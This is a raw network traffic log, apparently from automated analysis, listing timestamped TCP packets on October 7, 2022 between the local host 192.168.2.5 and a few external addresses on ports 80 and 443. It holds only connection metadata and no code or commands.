Oct 7, 2022 15:58:40.168322086 CEST	49702	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:40.198597908 CEST	80	49702	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:40.199541092 CEST	80	49702	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:40.396847010 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.396928072 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.397017956 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.401742935 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.401783943 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.430598021 CEST	80	49702	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:40.430668116 CEST	49702	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:40.445430040 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.445529938 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.860960007 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.861020088 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.861407042 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.864032030 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.864063978 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.957426071 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.957510948 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.957551003 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.957582951 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.957612038 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.957612038 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.957662106 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.957691908 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.957711935 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.959034920 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.959124088 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.960758924 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.960813999 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.960825920 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.960841894 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.960895061 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.974324942 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.974441051 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.974469900 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.974517107 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.974576950 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.975074053 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.975158930 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.976548910 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.976581097 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.976638079 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.976659060 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.976731062 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.977917910 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.977974892 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.978024960 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.978039980 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.978091955 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.979074001 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.979156017 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.979934931 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.979990005 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.980030060 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.980051041 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.980108023 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.980803967 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.980834961 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.980881929 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.980899096 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.980982065 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.981694937 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.981755972 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.982528925 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.982568979 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.982587099 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.982605934 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.982654095 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.983412981 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.983458996 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.983484983 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.983506918 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.983578920 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.991214991 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.991288900 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.991492033 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.991570950 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.991892099 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.991954088 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.991972923 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.992037058 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.992640018 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.992702007 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.993369102 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.993427992 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.993452072 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.993469954 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.993539095 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.994004011 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.994046926 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.994072914 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.994090080 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.994143009 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.994689941 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.994764090 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.994765043 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.994781971 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.994838953 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.995876074 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.995922089 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.995951891 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.995954037 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.995971918 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.996004105 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.996496916 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.996531963 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.996551037 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.996570110 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.996623039 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.997386932 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.997447968 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.997469902 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.997488976 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.997513056 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.998209000 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.998253107 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.998271942 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.998290062 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.998342991 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.998888969 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.998958111 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.998970032 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.998989105 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.999038935 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.999367952 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.999430895 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.999450922 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.999500036 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.999506950 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:40.999521971 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:40.999608994 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.000368118 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.000422955 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.000437021 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.000438929 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.000452042 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.000494957 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.001239061 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.001302004 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.001327991 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.001338005 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.001348972 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.001385927 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.001396894 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.001414061 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.001436949 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.008289099 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008341074 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008373022 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.008385897 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008397102 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008430004 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.008807898 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008851051 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008868933 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.008878946 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008889914 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008924007 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.008938074 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.008991003 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.009007931 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.009474039 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.009510040 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.009536982 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.009541035 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.009551048 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.009578943 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.009591103 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.009612083 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.009639025 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.009654999 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.009711981 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.010303020 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.010366917 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.010396004 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.010396004 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.010413885 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.010447979 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.011601925 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.011647940 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.011676073 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.011682987 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.011702061 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.011719942 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.011733055 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.011754036 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.011776924 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.011790037 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.011838913 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.013339043 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013420105 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.013422012 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013433933 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013465881 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013489962 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.013495922 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013504982 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013535023 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013545990 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.013562918 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013581991 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013583899 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.013633013 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.013641119 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013652086 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013683081 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013699055 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.013725042 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013741970 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013773918 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.013775110 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013783932 CEST	443	49703	185.60.216.35	192.168.2.5
Oct 7, 2022 15:58:41.013833046 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:41.078476906 CEST	49703	443	192.168.2.5	185.60.216.35
Oct 7, 2022 15:58:45.599086046 CEST	49704	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:45.625847101 CEST	80	49704	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:45.627680063 CEST	49704	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:45.640348911 CEST	49704	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:45.667293072 CEST	80	49704	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:45.668318987 CEST	80	49704	103.136.42.153	192.168.2.5
Oct 7, 2022 15:58:45.729145050 CEST	49704	80	192.168.2.5	103.136.42.153
Oct 7, 2022 15:58:45.859287977 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:45.859338045 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:45.859431028 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:45.863862991 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:45.863888025 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:45.905524015 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:45.905683041 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.490022898 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.490067005 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.490655899 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.496180058 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.496226072 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.606976032 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.607115984 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.607204914 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.607218981 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.607249022 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.607275009 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.607337952 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.607350111 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.607378960 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.607409000 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.607841015 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.609122992 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.609139919 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.609703064 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.609766960 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.609781027 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.609874010 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.615762949 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.615780115 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.623929977 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.624039888 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.624057055 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.624443054 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.624521971 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.624532938 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.625952959 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.626029968 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.626110077 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.626125097 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.627140999 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.627237082 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.627253056 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.627285957 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.627358913 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.627367973 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.627479076 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.628428936 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.628534079 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.629127026 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.629205942 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.629215002 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.629240990 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.629302025 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.629978895 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.630049944 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.630059004 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.630073071 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.630847931 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.630939960 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.630951881 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.631124020 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.631692886 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.631776094 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.631820917 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.631894112 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.632558107 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.632630110 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.632647038 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.632703066 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.640670061 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.640741110 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.640935898 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.641011000 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.641056061 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.641108036 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.641714096 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.641782999 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.642160892 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.642215014 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.642235994 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.642287970 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.642802954 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.642851114 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.643460989 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.643511057 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.643531084 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.643572092 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.644136906 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.644187927 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.644217014 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.644260883 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.645102024 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.645164967 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.645184994 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.645231962 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.645258904 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.645311117 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.645979881 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.646070004 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.646109104 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.646126032 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.646217108 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.646787882 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.646846056 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.646894932 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.646943092 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.646972895 CEST	443	49705	157.240.20.35	192.168.2.5
Oct 7, 2022 15:58:46.647018909 CEST	49705	443	192.168.2.5	157.240.20.35
Oct 7, 2022 15:58:46.647630930 CEST	443	49705	157.240.20.35	192.168.2.5
